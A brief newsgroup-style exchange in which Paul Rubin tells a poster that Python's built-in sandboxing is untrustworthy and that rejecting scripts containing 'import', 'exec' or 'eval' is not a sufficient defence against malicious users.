Sandboxes

[Paul Rubin]

42 <nospam at nospam.com> writes:
> Googling for information on securing Python in a "sandbox" seems 
> indicate that there are some built in features, but they aren't really 
> trustworthy. Is that correct?

Yes.

> For my purposes, I really just want to let users run in a sandbox, with 
> access to only the language, manipuate a few published objects in the 
> application (and perhaps give them some string and math libraries if 
> applicable).

If they are malicious, this is asking for trouble.

> I was wondering if it would be effective to pre-parse incoming scripts 
> and reject those containing "import"? I'd also have the application 
> inject the (short) list of trusted imports to the script before passing 
> it to the interpreter.

No, that's not enough.

> Would this sufficient? Are there any drawbacks or giant gaping holes? 
> I'm anticipating that I'd also need to block 'exec' and 'eval' to 
> prevent an import from being obfuscated past the pre-parse.
> 
> Or is this a hopeless cause? 

Yes.  It's even difficult with Java and Javascript, which were designed
to have such security.